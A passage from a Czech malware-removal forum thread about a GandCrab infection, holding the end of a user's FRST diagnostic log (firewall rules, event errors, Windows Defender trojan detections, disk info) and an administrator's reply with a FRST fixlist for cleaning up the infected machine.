FirewallRules: [UDP Query User{E933777E-BC31-4C33-B9F7-2F06BF87CBAA}C:\users\megret-tpc\appdata\local\gamecenter\gamecenter.exe] => (Allow) C:\users\megret-tpc\appdata\local\gamecenter\gamecenter.exe
FirewallRules: [{92755B08-09F0-4AF8-A979-0F12AA9FBFB1}] => (Allow) C:\Games\World_of_Tanks\WoTLauncher.exe
FirewallRules: [{813C5E84-E232-4735-B441-54105C633201}] => (Allow) C:\Games\World_of_Tanks\WoTLauncher.exe
FirewallRules: [{7C10115A-DB4D-493B-98A9-B045D5BDC9DC}] => (Allow) C:\Games\World_of_Tanks\worldoftanks.exe
FirewallRules: [{AF5F6F56-9A55-4017-A608-489314B2F5D9}] => (Allow) C:\Games\World_of_Tanks\worldoftanks.exe
FirewallRules: [{15E2B108-91EE-41CF-B641-D046D8163340}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{6D3B9992-F3CD-40BF-8441-7CEA3C921370}] => (Allow) C:\steam\Steam.exe
FirewallRules: [{2CA812BC-B82B-45CD-8572-277E5D632EFD}] => (Allow) C:\steam\Steam.exe
FirewallRules: [{2EB35DAB-EAF8-47ED-851B-FE938E3B7985}] => (Allow) C:\steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{E57340DD-B60A-4128-86BE-91652B7847D9}] => (Allow) C:\steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{3C235A18-B5FA-45EB-A9A1-BF654CBAF913}] => (Allow) E:\SteamLibrary\steamapps\common\ARK SOTF\ShooterGame\Binaries\Win64\ShooterGame_BE.exe
FirewallRules: [{567A28E2-777A-41F4-9782-13858C325692}] => (Allow) E:\SteamLibrary\steamapps\common\ARK SOTF\ShooterGame\Binaries\Win64\ShooterGame_BE.exe
FirewallRules: [{F83307F4-C213-4391-A0E7-E858F04E7698}] => (Allow) C:\WINDOWS\SysWOW64\msiexec.exe
FirewallRules: [{CFA12342-5A44-4771-94EA-6913D4D30364}] => (Allow) C:\Users\MeGret-TPC\AppData\Local\kAyeMDseXh.exe
FirewallRules: [{88291374-E8D6-4B34-914C-EA8B2AADE13B}] => (Allow) C:\Users\MeGret-TPC\deiefECnJ.exe
FirewallRules: [{4C89096B-6A31-4EBF-BA6E-AFE3D37ECD3A}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{B89DDEF6-C334-4413-8CBB-EE162CBA85CF}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{560E5289-67E4-4DEC-AC6E-3023E75056BA}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{A1D55ED3-F823-4E48-9DC4-24C673DCE973}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{0CD643F1-ADE3-4FD6-AD2B-A8935888B1F4}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{B54CF621-D2A0-4D6C-8FA4-3D50B141C066}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{6FBC9D66-5B3E-4FA5-8217-42B9E8DFBD3B}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{1EBCBEAF-888D-4B86-9D35-8092B1A4D336}] => (Allow) C:\steam\bin\cef\cef.win7x64\steamwebhelper.exe
FirewallRules: [{A6D7E43F-0AB3-45A0-B6DC-FC2EACA56B3C}] => (Allow) C:\steam\bin\cef\cef.win7x64\steamwebhelper.exe
FirewallRules: [{D18A5587-7E6B-438D-937F-16E391A53B77}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{49AD8509-9CA3-4DD0-9B96-410230908DD1}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{311177C2-2B48-42BF-AC13-90EEDA19A0D3}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{1CCAE30C-550F-4136-90FA-2E41DCC1F38F}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{43497D49-1541-459B-ABC5-709B698D8098}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{019ED680-DDF2-4E20-A64C-E89D1EE6A170}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{D4C7EFC8-901F-430B-AC77-97738E785570}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{C0E1617A-E1BD-42AB-A58B-4754EB9D770C}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{27D58F9D-16EE-4208-B631-AE4754597687}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{0ED1EF5A-8302-441C-82B6-B6BD5E81934F}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{5D6C0BA3-423F-49E4-A8DE-9AFF54CBCB32}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{7C565C86-3C02-4BC3-B513-103C600D3DCD}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{47F7DCB9-4CD8-45C1-90EB-EC9A1604AA8B}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{35AF049C-B43B-4765-93D1-461C7E435552}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{3076B393-E46B-4712-9AC9-2563D7C64BD2}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{2CFB1987-EF73-45DB-99AE-0FD2FBB605C7}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{2BDC570B-1EB0-4385-85C3-FB0C1D22DD61}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{E04F468A-E1A9-4780-AB13-A0A9A4475483}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{80F4BBCA-6100-49FA-8CF7-06D24C7862F6}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{118D8263-F00A-4983-912E-EEFCB66E4AD8}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{0654B5D4-BA52-4D21-B25D-B5D71E9F29E3}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{FE6F51AA-3BFE-410E-8254-A969258614E5}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{17D9820E-BF95-4D08-95FA-BECFED2E7F82}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{F2A75EED-D282-4C92-8FCF-9EF498A174C5}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{7136348D-5089-456D-85D1-3BBE3B6DBEDD}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{D1217ECA-185B-4AA4-94C5-0ECAE3C57D93}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{E05ABCFA-06EA-48E7-BC47-8CBDCF773A51}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{A1A9908B-5F39-424E-BF61-4711280B12EB}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{B0E03458-6F9D-44C7-8C18-FB6BBDE91114}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{81567C98-4430-44E0-BB54-E06404F8A3A3}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
==================== Restore Points =========================
22-10-2018 00:39:02 Instalační služba modulů systému Windows
25-10-2018 05:18:37 Instalační služba modulů systému Windows
26-10-2018 19:57:26 Instalační služba modulů systému Windows
28-10-2018 11:57:17 Instalační služba modulů systému Windows
29-10-2018 17:57:55 Instalační služba modulů systému Windows
30-10-2018 19:09:07 Instalační služba modulů systému Windows
02-11-2018 08:42:24 Instalační služba modulů systému Windows
03-11-2018 10:42:18 Instalační služba modulů systému Windows
04-11-2018 20:42:45 Instalační služba modulů systému Windows
05-11-2018 22:42:28 Instalační služba modulů systému Windows
07-11-2018 22:09:36 Instalační služba modulů systému Windows
08-11-2018 22:43:05 Instalační služba modulů systému Windows
10-11-2018 00:02:03 Operace obnovení
==================== Faulty Device Manager Devices =============
Name: Realtek High Definition Audio
Description: Realtek High Definition Audio
Class Guid: {4d36e96c-e325-11ce-bfc1-08002be10318}
Manufacturer: Realtek
Service: IntcAzAudAddService
Problem: : This device is not working properly because Windows cannot load the drivers required for this device. (Code 31)
Resolution: Update the driver
Name: NVIDIA Virtual Audio Device (Wave Extensible) (WDM)
Description: NVIDIA Virtual Audio Device (Wave Extensible) (WDM)
Class Guid: {4d36e96c-e325-11ce-bfc1-08002be10318}
Manufacturer: NVIDIA
Service: nvvad_WaveExtensible
Problem: : This device is not working properly because Windows cannot load the drivers required for this device. (Code 31)
Resolution: Update the driver
Name: AMD High Definition Audio Device
Description: AMD High Definition Audio Device
Class Guid: {4d36e96c-e325-11ce-bfc1-08002be10318}
Manufacturer: Advanced Micro Devices
Service: AtiHDAudioService
Problem: : This device is not working properly because Windows cannot load the drivers required for this device. (Code 31)
Resolution: Update the driver
==================== Event log errors: =========================
Application errors:
==================
Error: (11/10/2018 04:21:29 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Program FRST64.exe verze 8.11.2018.0 přestal spolupracovat se systémem Windows a byl ukončen. Chcete-li zjistit, zda je k dispozici více informací o tomto problému, vyhledejte historii problému v ovládacím panelu Zabezpečení a údržba.
ID procesu: 1cc8
Čas spuštění: 01d47908e0efb16d
Čas ukončení: 4294967295
Cesta k aplikaci: C:\Users\MeGret-TPC\Desktop\FRST64.exe
ID hlášení: acfa109c-b498-4883-a5af-07618710530e
Úplný název balíčku s chybou:
ID aplikace související s balíčkem s chybou:
Error: (11/10/2018 04:19:41 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Program chrome.exe verze 70.0.3538.77 přestal spolupracovat se systémem Windows a byl ukončen. Chcete-li zjistit, zda je k dispozici více informací o tomto problému, vyhledejte historii problému v ovládacím panelu Zabezpečení a údržba.
ID procesu: 1b5c
Čas spuštění: 01d4790893cc359a
Čas ukončení: 4294967295
Cesta k aplikaci: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
ID hlášení: c6a75218-624a-41fa-8e8e-1ff21f8ad078
Úplný název balíčku s chybou:
ID aplikace související s balíčkem s chybou:
Error: (11/10/2018 01:05:43 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Program AdwCleaner.exe verze 7.2.4.0 přestal spolupracovat se systémem Windows a byl ukončen. Chcete-li zjistit, zda je k dispozici více informací o tomto problému, vyhledejte historii problému v ovládacím panelu Zabezpečení a údržba.
ID procesu: 1198
Čas spuštění: 01d478ed93f4bf66
Čas ukončení: 5
Cesta k aplikaci: C:\Users\MeGret-TPC\Desktop\AdwCleaner.exe
ID hlášení: 80872c30-faf7-43e2-8d84-1a18cd724194
Úplný název balíčku s chybou:
ID aplikace související s balíčkem s chybou:
Error: (11/10/2018 01:02:43 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Název chybující aplikace: GPUTweakII.exe, verze: 1.1.7.2, časové razítko: 0x56822419
Název chybujícího modulu: Vender.dll, verze: 1.1.2.6, časové razítko: 0x565bb08a
Kód výjimky: 0xc0000005
Posun chyby: 0x0000ec74
ID chybujícího procesu: 0x1d14
Čas spuštění chybující aplikace: 0x01d478ed4918c322
Cesta k chybující aplikaci: C:\Program Files (x86)\ASUS\GPU TweakII\GPUTweakII.exe
Cesta k chybujícímu modulu: C:\Program Files (x86)\ASUS\GPU TweakII\Vender.dll
ID zprávy: 1466c890-36de-420c-a88c-56f090f183f4
Úplný název chybujícího balíčku:
ID aplikace související s chybujícím balíčkem:
Error: (11/10/2018 12:58:13 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Název chybující aplikace: rundll32.exe, verze: 10.0.17134.1, časové razítko: 0x1e3f5e34
Název chybujícího modulu: IECache.dll_unloaded, verze: 0.0.0.0, časové razítko: 0x2a425e19
Kód výjimky: 0xc000041d
Posun chyby: 0x00023e48
ID chybujícího procesu: 0x1f70
Čas spuštění chybující aplikace: 0x01d478eca61ca46c
Cesta k chybující aplikaci: C:\Windows\SysWOW64\rundll32.exe
Cesta k chybujícímu modulu: IECache.dll
ID zprávy: 3acf7487-f350-456e-b9c7-0102e914752e
Úplný název chybujícího balíčku:
ID aplikace související s chybujícím balíčkem:
Error: (11/10/2018 12:58:09 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Název chybující aplikace: rundll32.exe, verze: 10.0.17134.1, časové razítko: 0x1e3f5e34
Název chybujícího modulu: KERNELBASE.dll, verze: 10.0.17134.165, časové razítko: 0xfa43f4b2
Kód výjimky: 0x0eedfade
Posun chyby: 0x0010ddc2
ID chybujícího procesu: 0x1f70
Čas spuštění chybující aplikace: 0x01d478eca61ca46c
Cesta k chybující aplikaci: C:\Windows\SysWOW64\rundll32.exe
Cesta k chybujícímu modulu: C:\WINDOWS\System32\KERNELBASE.dll
ID zprávy: dda83beb-abfa-48ef-82ab-8460cf862a34
Úplný název chybujícího balíčku:
ID aplikace související s chybujícím balíčkem:
Error: (11/10/2018 12:57:16 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Program AdwCleaner.exe verze 7.2.4.0 přestal spolupracovat se systémem Windows a byl ukončen. Chcete-li zjistit, zda je k dispozici více informací o tomto problému, vyhledejte historii problému v ovládacím panelu Zabezpečení a údržba.
ID procesu: 1f28
Čas spuštění: 01d478ec6df24fee
Čas ukončení: 4294967295
Cesta k aplikaci: C:\Users\MeGret-TPC\Desktop\AdwCleaner.exe
ID hlášení: d409bece-6a81-4f8a-a836-75de7fa2c8a5
Úplný název balíčku s chybou:
ID aplikace související s balíčkem s chybou:
Error: (11/10/2018 11:53:07 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Název chybující aplikace: GPUTweakII.exe, verze: 1.1.7.2, časové razítko: 0x56822419
Název chybujícího modulu: Vender.dll, verze: 1.1.2.6, časové razítko: 0x565bb08a
Kód výjimky: 0xc0000005
Posun chyby: 0x0000ec74
ID chybujícího procesu: 0x1d28
Čas spuštění chybující aplikace: 0x01d478e38ff9b652
Cesta k chybující aplikaci: C:\Program Files (x86)\ASUS\GPU TweakII\GPUTweakII.exe
Cesta k chybujícímu modulu: C:\Program Files (x86)\ASUS\GPU TweakII\Vender.dll
ID zprávy: 357165f3-1356-4bd3-bbb2-0f6b0c39a0a1
Úplný název chybujícího balíčku:
ID aplikace související s chybujícím balíčkem:
System errors:
=============
Error: (11/10/2018 04:22:34 PM) (Source: DCOM) (EventID: 10005) (User: FRNDA)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby ShellHWDetection s argumenty Není k dispozici za účelem spuštění serveru:
{DD522ACC-F821-461A-A407-50B198B896DC}
Error: (11/10/2018 04:22:21 PM) (Source: DCOM) (EventID: 10005) (User: FRNDA)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby ShellHWDetection s argumenty Není k dispozici za účelem spuštění serveru:
{DD522ACC-F821-461A-A407-50B198B896DC}
Error: (11/10/2018 04:22:15 PM) (Source: DCOM) (EventID: 10005) (User: FRNDA)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby WSearch s argumenty Není k dispozici za účelem spuštění serveru:
{9E175B6D-F52A-11D8-B9A5-505054503030}
Error: (11/10/2018 04:22:15 PM) (Source: DCOM) (EventID: 10005) (User: FRNDA)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby WSearch s argumenty Není k dispozici za účelem spuštění serveru:
{9E175B6D-F52A-11D8-B9A5-505054503030}
Error: (11/10/2018 04:22:14 PM) (Source: DCOM) (EventID: 10005) (User: FRNDA)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby WSearch s argumenty Není k dispozici za účelem spuštění serveru:
{7D096C5F-AC08-4F1F-BEB7-5C22C517CE39}
Error: (11/10/2018 04:22:14 PM) (Source: DCOM) (EventID: 10005) (User: FRNDA)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby WSearch s argumenty Není k dispozici za účelem spuštění serveru:
{7D096C5F-AC08-4F1F-BEB7-5C22C517CE39}
Error: (11/10/2018 04:22:11 PM) (Source: DCOM) (EventID: 10005) (User: FRNDA)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby ShellHWDetection s argumenty Není k dispozici za účelem spuštění serveru:
{DD522ACC-F821-461A-A407-50B198B896DC}
Error: (11/10/2018 04:22:04 PM) (Source: DCOM) (EventID: 10005) (User: FRNDA)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby WSearch s argumenty Není k dispozici za účelem spuštění serveru:
{E48EDA45-43C6-48E0-9323-A7B2067D9CD5}
Windows Defender:
===================================
Date: 2018-11-10 13:08:08.301
Description:
Prohledávání Antivirová ochrana v programu Windows Defender zjistilo malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: Trojan:Win32/Fuery.B!cl
ID: 2147718514
Závažnost: Vážné
Kategorie: Trojský kůň
Cesta: file:_C:\Users\MeGret-TPC\Favorites\Sec.VPN.ur\041938\urlmon.7z
Původ zjišťování: Místní počítač
Typ zjišťování: FastPath
Zdroj zjišťování: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze podpisu: AV: 1.279.1558.0, AS: 1.279.1558.0, NIS: 1.279.1558.0
Verze modulu: AM: 1.1.15400.4, NIS: 1.1.15400.4
Date: 2018-11-09 20:24:13.372
Description:
Prohledávání Antivirová ochrana v programu Windows Defender zjistilo malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: Trojan:Win32/Pynamer.A!ac
ID: 2147724878
Závažnost: Vážné
Kategorie: Trojský kůň
Cesta: file:_C:\Users\MeGret-TPC\AppData\Local\Temp\554040937\ic-0.a5e74b1d8d35b.exe
Původ zjišťování: Místní počítač
Typ zjišťování: FastPath
Zdroj zjišťování: Ochrana v reálném čase
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: C:\Program Files\EnigmaSoft\SpyHunter\ShKernel.exe
Verze podpisu: AV: 1.279.1512.0, AS: 1.279.1512.0, NIS: 1.279.1512.0
Verze modulu: AM: 1.1.15400.4, NIS: 1.1.15400.4
Date: 2018-11-09 20:24:10.218
Description:
Prohledávání Antivirová ochrana v programu Windows Defender zjistilo malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: Trojan:Win32/Gandcrab.AF
ID: 2147727324
Závažnost: Vážné
Kategorie: Trojský kůň
Cesta: file:_C:\Users\MeGret-TPC\AppData\Local\Temp\553868843\ic-0.ab0ccb5b5e191.exe
Původ zjišťování: Místní počítač
Typ zjišťování: Konkrétní
Zdroj zjišťování: Ochrana v reálném čase
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: C:\Program Files\EnigmaSoft\SpyHunter\ShKernel.exe
Verze podpisu: AV: 1.279.1512.0, AS: 1.279.1512.0, NIS: 1.279.1512.0
Verze modulu: AM: 1.1.15400.4, NIS: 1.1.15400.4
Date: 2018-11-09 20:22:44.310
Description:
Prohledávání Antivirová ochrana v programu Windows Defender zjistilo malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: Trojan:Win32/Skeeyah.A!rfn
ID: 2147694182
Závažnost: Vážné
Kategorie: Trojský kůň
Cesta: file:_C:\ProgramData\kitot\kitot.exe
Původ zjišťování: Místní počítač
Typ zjišťování: Konkrétní
Zdroj zjišťování: Ochrana v reálném čase
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: C:\Program Files\EnigmaSoft\SpyHunter\ShKernel.exe
Verze podpisu: AV: 1.279.1512.0, AS: 1.279.1512.0, NIS: 1.279.1512.0
Verze modulu: AM: 1.1.15400.4, NIS: 1.1.15400.4
Date: 2018-11-08 22:47:12.601
Description:
Prohledávání Antivirová ochrana v programu Windows Defender zjistilo malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: TrojanSpy:Win32/SocStealer!rfn
ID: 2147724296
Závažnost: Vážné
Kategorie: Trojský monitorovací software
Cesta: chromeinstall:_HKLM\SOFTWARE\Wow6432Node\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\GOOGLE CHROME; file:_C:\Program Files (x86)\Google\Chrome\Application\winmm.dll
Původ zjišťování: Místní počítač
Typ zjišťování: Konkrétní
Zdroj zjišťování: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze podpisu: AV: 1.279.1442.0, AS: 1.279.1442.0, NIS: 1.279.1442.0
Verze modulu: AM: 1.1.15400.4, NIS: 1.1.15400.4
Date: 2018-11-10 16:22:01.920
Description:
Funkce Ochrana v reálném čase u prohledávání Antivirová ochrana v programu Windows Defender zjistila chybu a došlo k jejímu selhání.
Funkce: Při přístupu
Kód chyby: 0x8007043c
Popis chyby: Tuto službu nelze spustit v nouzovém režimu.
Důvod: Antimalwarová ochrana přestala z neznámých důvodů fungovat. V některých případech lze tento problém vyřešit restartováním služby.
Date: 2018-11-10 13:00:24.063
Description:
Funkce Ochrana v reálném čase u prohledávání Antivirová ochrana v programu Windows Defender zjistila chybu a došlo k jejímu selhání.
Funkce: Při přístupu
Kód chyby: 0x8007043c
Popis chyby: Tuto službu nelze spustit v nouzovém režimu.
Důvod: Antimalwarová ochrana přestala z neznámých důvodů fungovat. V některých případech lze tento problém vyřešit restartováním služby.
Date: 2018-11-10 12:58:54.819
Description:
Funkce Ochrana v reálném čase u prohledávání Antivirová ochrana v programu Windows Defender zjistila chybu a došlo k jejímu selhání.
Funkce: Při přístupu
Kód chyby: 0x8007043c
Popis chyby: Tuto službu nelze spustit v nouzovém režimu.
Důvod: Antimalwarová ochrana přestala z neznámých důvodů fungovat. V některých případech lze tento problém vyřešit restartováním služby.
Date: 2018-11-10 11:50:25.924
Description:
Funkce Ochrana v reálném čase u prohledávání Antivirová ochrana v programu Windows Defender zjistila chybu a došlo k jejímu selhání.
Funkce: Při přístupu
Kód chyby: 0x8007043c
Popis chyby: Tuto službu nelze spustit v nouzovém režimu.
Důvod: Antimalwarová ochrana přestala z neznámých důvodů fungovat. V některých případech lze tento problém vyřešit restartováním služby.
Date: 2018-11-10 11:18:20.921
Description:
Funkce Ochrana v reálném čase u prohledávání Antivirová ochrana v programu Windows Defender zjistila chybu a došlo k jejímu selhání.
Funkce: Při přístupu
Kód chyby: 0x8007043c
Popis chyby: Tuto službu nelze spustit v nouzovém režimu.
Důvod: Antimalwarová ochrana přestala z neznámých důvodů fungovat. V některých případech lze tento problém vyřešit restartováním služby.
CodeIntegrity:
===================================
Date: 2018-11-08 18:23:00.460
Description:
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\FlightSettings.dll because the set of per-page image hashes could not be found on the system.
Date: 2018-11-08 18:23:00.451
Description:
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\FlightSettings.dll because the set of per-page image hashes could not be found on the system.
Date: 2018-11-08 18:23:00.401
Description:
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\FlightSettings.dll because the set of per-page image hashes could not be found on the system.
Date: 2018-11-08 18:23:00.387
Description:
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\FlightSettings.dll because the set of per-page image hashes could not be found on the system.
Date: 2018-11-08 18:23:00.375
Description:
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\dsreg.dll because the set of per-page image hashes could not be found on the system.
Date: 2018-11-08 18:23:00.367
Description:
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\dsreg.dll because the set of per-page image hashes could not be found on the system.
Date: 2018-11-08 18:22:59.916
Description:
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\aepic.dll because the set of per-page image hashes could not be found on the system.
Date: 2018-11-08 18:22:59.893
Description:
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\aepic.dll because the set of per-page image hashes could not be found on the system.
==================== Memory info ===========================
Processor: AMD Ryzen 5 1600 Six-Core Processor
Percentage of memory in use: 12%
Total physical RAM: 8138.47 MB
Available physical RAM: 7088.88 MB
Total Virtual: 11594.47 MB
Available Virtual: 10749.81 MB
==================== Drives ================================
Drive c: () (Fixed) (Total:232.33 GB) (Free:110.8 GB) NTFS
Drive d: (Rezervováno systémem) (Fixed) (Total:0.49 GB) (Free:0.44 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive e: () (Fixed) (Total:147.73 GB) (Free:28.42 GB) NTFS
\\?\Volume{c2defe55-aa59-439b-a086-79f0d4925f93}\ (Obnovení) (Fixed) (Total:0.44 GB) (Free:0.06 GB) NTFS
\\?\Volume{38d6c9b2-0000-0000-0000-000e25000000}\ () (Fixed) (Total:0.83 GB) (Free:0.45 GB) NTFS
\\?\Volume{44319eeb-f1a7-42db-9a4e-36ce51961691}\ () (Fixed) (Total:0.09 GB) (Free:0.07 GB) FAT32
==================== MBR & Partition Table ==================
========================================================
Disk: 0 (Protective MBR) (Size: 232.9 GB) (Disk ID: 00000000)
Partition: GPT.
========================================================
Disk: 1 (MBR Code: Windows 7/8/10) (Size: 149.1 GB) (Disk ID: 38D6C9B2)
Partition 1: (Active) - (Size=500 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=147.7 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=849 MB) - (Type=27)
==================== End of Addition.txt ============================
Odvirování PC, zrychlení počítače, vzdálená pomoc prostřednictvím služby neslape.cz
GANDCRAB V5.0.4
Moderátor: Moderátoři
Pravidla fóra
Pokud chcete pomoc, vložte log z FRST [návod zde] nebo RSIT [návod zde]
Jednotlivé thready budou po vyřešení uzamčeny. Stejně tak ty, které budou nečinné déle než 14 dní. Vizte Pravidlo o zamykání témat. Děkujeme za pochopení.
!NOVINKA!
Nově lze využívat služby vzdálené pomoci, kdy se k vašemu počítači připojí odborník a bližší informace o problému si od vás získá telefonicky! Více na www.neslape.cz
Pokud chcete pomoc, vložte log z FRST [návod zde] nebo RSIT [návod zde]
Jednotlivé thready budou po vyřešení uzamčeny. Stejně tak ty, které budou nečinné déle než 14 dní. Vizte Pravidlo o zamykání témat. Děkujeme za pochopení.
!NOVINKA!
Nově lze využívat služby vzdálené pomoci, kdy se k vašemu počítači připojí odborník a bližší informace o problému si od vás získá telefonicky! Více na www.neslape.cz
-
Rudy
- Site Admin
- Příspěvky: 118272
- Registrován: 30 říj 2003 13:42
- Bydliště: Plzeň
- Kontaktovat uživatele:
Re: GANDCRAB V5.0.4
Otevřte poznámkový blok a zkopírujte do něj:
Uložte na plochu jako fixlist.txt. Spusťte znovu FRST a klikněte na >Fix<. Po skončení akce se objeví log, který sem zkopírujte.Start
CloseProcesses:
Task: {132D8886-4A07-462A-B824-78AF1B6BF888} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2018-10-14] (Google Inc.)
Task: {6783EA1B-F8CB-4EBD-878B-51DDF41C013A} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2018-10-14] (Google Inc.)
Task: {877C1772-9F30-4BE9-8463-5DF5AA19A3D4} - \Microsoft\Windows\UNP\RunCampaignManager -> No File <==== ATTENTION
FirewallRules: [{CFA12342-5A44-4771-94EA-6913D4D30364}] => (Allow) C:\Users\MeGret-TPC\AppData\Local\kAyeMDseXh.exe
FirewallRules: [{88291374-E8D6-4B34-914C-EA8B2AADE13B}] => (Allow) C:\Users\MeGret-TPC\deiefECnJ.exe
C:\ProgramData\kitot
C:\Users\MeGret-TPC\AppData\Local\Temp
C:\Program Files (x86)\Google\Chrome\Application\winmm.dll
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [601424 2018-07-07] (Oracle Corporation)
HKU\S-1-5-21-819675408-2753461327-3771956256-1001\...\MountPoints2: {0a26cf40-38e2-11e6-9bc2-806e6f6e6963} - "I:\setup.exe"
HKU\S-1-5-21-819675408-2753461327-3771956256-1001\...\MountPoints2: {6faddee6-cef4-11e8-9c3f-806e6f6e6963} - "D:\DVDSetup.exe"
HKU\S-1-5-21-819675408-2753461327-3771956256-1001\...\MountPoints2: {8b1956be-cef6-11e8-9c42-309c23650ed5} - "E:\Lenovo_Suite.exe"
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_181\bin\ssv.dll => No File
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_181\bin\jp2ssv.dll => No File
FF Plugin-x32: @java.com/DTPlugin,version=11.181.2 -> C:\Program Files (x86)\Java\jre1.8.0_181\bin\dtplugin\npDeployJava1.dll [No File]
FF Plugin-x32: @java.com/JavaPlugin,version=11.181.2 -> C:\Program Files (x86)\Java\jre1.8.0_181\bin\plugin2\npjp2.dll [No File]
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [No File]
